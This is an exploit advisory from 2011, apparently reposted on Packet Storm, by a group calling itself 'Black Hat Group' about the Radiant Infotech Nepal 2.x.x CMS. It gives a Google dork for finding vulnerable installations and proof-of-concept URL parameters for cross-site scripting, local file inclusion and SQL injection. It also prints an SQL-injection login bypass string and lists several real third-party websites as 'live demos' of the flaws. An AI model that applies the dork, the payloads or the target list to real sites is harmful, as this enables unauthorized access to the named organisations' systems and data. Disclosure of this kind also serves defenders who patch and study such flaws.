Radiant Infotech Nepal version 2.x.x suffers from authentication bypass, cross site scripting, remote SQL injection, and local file inclusion vulnerabilities.
29203aa861f50cad3c37b90953891db2321344659ae53f0552deb39e94657a93[+]Title :.......Radiant Infotech Nepal 2.x.x Multiple Vulnerability
[+]Author :......Net.Edit0r
[+]Tested on :...Linux/PHP
---------------------------------------------------------------------------
[~] Founded by Net.Edit0r
[~] Team: Black Hat Group #BHG
[~] Contact: Black.hat.tm@Gmail.Com
[~] Home: http://Black-HG.Org
[~] Vendor: http://www.radiantnepal.com/
[~] Category: Web Apps
==========ExPl0iT3d by Net.Edit0r==========
[+] DORK: "Powered by :: Radiant Infotech Nepal Pvt. Ltd"
[ I ]. Multiple Vulnerability
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[+++] Important: The security problem in the directory "Index.php" has
been created.
[P0C]: http://127.0.0.1/?msg=[Xss]
[P0C]: http://127.0.0.1/index.php?action=[LFI]
[P0C]: http://127.0.0.1/index.php?linkId=[SQL]
[P0C]: http://127.0.0.1/index.php?errMsg=[Xss]
[P0C]: http://127.0.0.1/index.php?action=loginbox [Login Bypass]
[ I ]. ExploiT Login Bypass
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
user: 'or''='
pass: 'or''='
[L!v3 D3m0s]:
http://www.nepalphd.org/?msg=[Xss]
http://www.nepalphd.org/index.php?action=[LFI]
http://www.nepalphd.org/index.php?linkId=[SQL]
http://www.raptifashiondirect.com/index.php?action=[LFI]
http://www.raptifashiondirect.com/index.php?errMsg=[Xss]
http://www.upamadevelopers.com/index.php?action=loginbox [Login Bypass]
http://www.upamadevelopers.com/index.php?action=[LFI]
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[+] TIME TABLE:
2011-06-01 - Vulnerability discovered.
2011-06-03 - Advisory released.
===========================================================================================
[!] Black Hat Group ./Iranian HackerZ
===========================================================================================
[!] MaiL: Black.Hat.tm@Gmail.Com ~ Net.Edit0r@Att.Net
===========================================================================================
[!] Greetz To : DarkCoder | 3H34N | Amir-MaGiC | H3x | D3adlY | Cho0bin
===========================================================================================
[!] Spec Th4nks: HUrr!c4nE | B3hz4d | M4Hd1 |Mikili And All My Friendz
===========================================================================================
[!] Persian Gulf 4 Ever
[!] I Love Iran And All Iranian People
===========================================================================================
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed